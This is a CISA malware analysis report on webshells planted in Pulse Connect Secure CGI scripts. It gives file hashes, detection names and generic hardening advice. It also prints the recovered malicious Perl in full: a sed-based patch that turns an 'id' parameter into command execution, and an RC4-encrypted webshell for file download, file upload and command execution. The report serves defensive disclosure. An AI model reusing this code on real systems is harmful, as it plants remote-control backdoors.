Malware Analysis Report (AR21-202M)

MAR-10338868-1.v1: Pulse Connect Secure

Click to Tweet.
Click to send to Facebook.
Click to Share.

Summary

Malware Analysis Report
10338868.r1.v1
2021-07-14

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Three files were submitted to CISA for analysis. One file consists of shell scripts designed to modify a Pulse Secure Perl Common Gateway Interface (CGI) script file to become a webshell. The other files are capable of allowing a remote operator to read and write files on the target system. This analysis is derived from malicious files found on Pulse Connect Secure devices.


For a downloadable copy of IOCs, see: MAR-10338868-1.v1.WHITE.stix.

Submitted Files (3)

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4 (licenseserverproto.cgi)

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226 (healthcheck.cgi)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

Findings

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojanwebshell

Details
Name DSUpgrade.pm
Size 5270 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1 1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256 a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512 d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
Entropy 5.031760
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches
99 359b86d7f20430f0418b8401be34251bcddcc8aa48803597d8d78caaa547c875
91 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
99 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file “/pkg/do-install”:

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post, and also copy another instance of the shell into the parameter '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226

Tags

webshell

Details
Name healthcheck.cgi
Size 9272 bytes
Type Perl script text executable
MD5 6a5ba3223f1eac63f9bb29262f73e90d
SHA1 870f0e58f0a0ff695aab39a93ad26b16698887a7
SHA256 85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226
SHA512 856bab44cf27c750a5bc378252eb15548e8590e906bc4ab2cb14e5a28e19e75ca356e976e8a0e66f8e9d69e5b11e8007487d167d91edc79dc05ea32308309f3f
ssdeep 192:rzwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yieyhm:rzwJwrXWOUV9AWojoiOuayQ
Entropy 5.118183
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script that contains malicious code that was patched into the file. The modification modifies the file to become a webshell. The following code includes comments that provides information on the capabilities of this patched webshell:

--Begin Malicious Code--
use MIME::Base64;
use Crypt::RC4;
my $ph="<REDACTED>";
sub r    ==> Generate random block of data for encryption
{
my $n=$_[0];
my $rs;
for (my $i=0;$i<$n;$i++)
{
my $n1=int(rand(256));
$rs.=chr($n1);
}
return $rs;
}
sub a ==> RC4 and BASE64 encryption function
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}
sub b ==> RC4 and BASE64 decryption function
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}
sub c ==> Download file from target system
{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );while(<FILE>)
{
$fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);         ==> RC4 encrypted and BASE64 encode file before sending it to operator
}
sub d    ==> Decrypt and writes out file
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');    ==> Md5 is the output file contains the file to be written
$fi=b($fi);
my $pa=CGI::param('md5'); ==> it contains the data to be written to file
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;     ==> data content is written to file
close (*outfile);
}
sub e         ==> decrypt and execute system command provided
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);             ==> incoming command is BASE64 decoded and RC4 decrypted
my $rt;
if (!$na or $na eq "cd")
{
$rt="Error 404";
}
else
{
my $ot="/tmp/1";
system("$na >/tmp/1 2>&1");     ==> Execute decrypted command
open(*cmd_result,"<$ot");
while(<cmd_result>)
{
$rt=$rt.$_;
}
close(*cmd_result);
unlink $ot
}
print a($rt);
}
sub f
{
if(CGI::param('cert'))
{
d();
}
elsif(CGI::param('img') and CGI::param('name'))
{
c();
}
elsif(CGI::param('name') and CGI::param('img') eq "")
{
e();     ==> Decrypt and execute system command provided
}
else
{
&main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST")
{
f();
}
else
{
&main();
}
--End Malicious Code--

The webshell is capable of allowing a remote operator to read and write files on the target system. It is also capable of allowing the remote operator to pass system commands to the target system which will be executed as system commands. The data passed to and from this webshell by the remote operator will be RC4 encrypted with a hard coded RC4 key.

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3372 bytes
Type Perl script text executable
MD5 e3903c8e9715080795b3fc045d8f8db7
SHA1 be63eac2efc4a2bdc17dcd067975ccd0113cf70a
SHA256 44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4
SHA512 5bd97a7184ff6707ad0801b544d58ad72884a0f51aba3802ebb0cff1c6bcb30b3e3392291fedc90c676cc2808b9a0b879d5f3dca7311474f34fd3fd0272ae5cb
ssdeep 48:EbLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejB4:EvYkJAZfv/wO27Yv/kh91TQik
Entropy 5.397215
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script with malicious code patched in. This file and "healthcheck.cgi" (85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226) have the same malicious code patched in. This file contains a different hard-coded RC4 key for encryption.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Please share your thoughts.

We recently updated our anonymous product survey; we'd welcome your feedback.